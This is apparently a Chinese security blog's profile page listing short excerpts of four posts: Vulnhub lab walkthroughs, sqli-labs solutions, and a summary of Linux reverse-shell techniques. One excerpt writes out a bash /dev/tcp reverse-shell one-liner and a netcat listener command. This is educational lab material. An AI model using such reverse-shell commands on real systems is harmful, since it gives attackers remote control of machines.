自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(4)
  • 收藏
  • 关注

原创 Vulnhub渗透记录2-Warzone2

文章目录下载端口扫描FTP连接1337端口反弹shellssh连接下载虚拟机下载地址:http://www.vulnhub.com/entry/warzone-2,598/攻击机:kail 192.168.169.128靶机:192.168.169.131端口扫描找到靶机所在ip后进行端口扫描nmap -A -p- -T4 -P0 192.168.169.131FTP连接开启了ftp服务输入anonymous尝试匿名连接发现靶机允许进行ftp匿名连接。发现有三张PNG。下载

2020-12-12 18:54:39 384

原创 Linux反弹shell方式总结

文章目录bash反弹基础知识指令分析bash反弹反弹指令:bash -i >& /dev/tcp/ip/port 0>&1反弹步骤:在kail上开启7777侦听:nc -lvp 7777在靶机上输入反弹指令即可反弹成功基础知识linux下有三个标准的文件描述符:0 - stdin 代表标准输入,使用<或<<1 - stdout 代表标准输出,使用>或>>2 - stderr 代表标准错误输出,使用2>或2>

2020-12-11 14:07:50 855

原创 Vulnhub渗透记录1-Me and My Girlfriend

文章目录下载渗透过程nmap扫描SSH爆破访问80端口页面下载下载地址:https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/安装后以NAT模式运行攻击机kail和靶机在一个网段渗透过程nmap扫描发现靶机ip为192.168.169.130扫描开放端口及服务:SSH爆破发现开放了22和80端口端口号端口说明攻击方向22SSH远程连接爆破,SSH隧道及内网代理转发,文件传输先对22端口尝试爆

2020-12-09 23:03:53 140

原创 sqli-labs安装与less1-20解法

文章目录sqli-labs环境安装Basic Challengesless1联合注入时间注入报错注入布尔注入sqlmapless2less3less4less5less6less7less8less9less10less 11通过闭合直接查询sqlmap -techniqueless12less13less14less15less16less17sqli-labs环境安装sqli-labs下载地址:https://github.com/Audi-1/sqli-labsphpstudy下载地址:http

2020-12-08 20:50:23 622

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除